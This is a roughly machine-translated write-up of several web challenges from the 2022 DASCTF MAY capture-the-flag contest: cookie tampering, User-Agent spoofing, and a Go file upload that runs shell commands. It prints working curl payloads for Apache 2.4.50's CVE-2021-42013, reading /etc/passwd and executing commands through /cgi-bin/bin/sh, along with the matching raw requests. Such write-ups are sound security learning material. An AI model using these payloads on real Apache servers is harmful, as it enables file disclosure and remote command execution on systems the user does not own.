2022DASCTF MAY

The big guys are trying to , I can't leave it alone. Come on ！！！

Power Cookie

Open the interface , Well, log in as a tourist , click  

Nothing , Generally, such problems are corrected by grabbing the package ,cookie The value of or x-forwarded-for etc.

Tips admin That's it cookie 

Tried it on , Find out cookie admin=1 That's all right.  

Magic browser

No idea , Or take a look at the source code

 hex code , Decode it ,

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75

 log

  Then change the file User-Agent

  You can get flag

getme

Open the page <!-- pwd:/usr/local/apache2/ -->, Just this directory information

One word , Mongolia ！

then burp Sweep it , Find out

  Search for Apache/2.4.50 (Unix),

Apache HTTP Server 2.4.50 Path traversal and file disclosure vulnerabilities in （CVE-2021-42013）

Exploit poc：

curl -v --path-as-is Destination address : port /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

You can view any file  

Indicates that there is a vulnerability

The target server is turned on cgi perhaps cgid When , It can be executed by command

    curl -v --data "echo; command " ' Destination address : port /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

  perhaps

GET :

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

POST:

echo Content-Type: text/plain; echo;ls /

I don't know why ,  No return value , But look at others wp this is it , Then come out the catalogue , Then explore , It could be me burp Something went wrong , debugged .

hackme

Open the interface and find that you can click at the bottom , Click in

  It is found that there may be a file in every link , And a command is executed in each corresponding file . Like above whoami、pwd wait .

See this and ,go Language has not been learned yet , Let's have a brief understanding of ,Go Used in language os/exec Five positions for executing commands - You know Need to upload uers file , Then he will go go Parsing

package main
 
import (
    "fmt"
    "os/exec"
)
 
func main() {
    Command("ls /")            Executed command
}
 
func Command(cmd string) error {
    c := exec.Command("bash", "-c", cmd)
    output, err := c.CombinedOutput()
    fmt.Println(string(output))
    return err
}

Finally found flag, use cat /flag  Replace... In the above statement ls / You can find flag. So this question seems to be incomplete go Even if you don't understand go Language , The test is go Script .

The next two questions , Realization is ability , Not enough , Continue to learn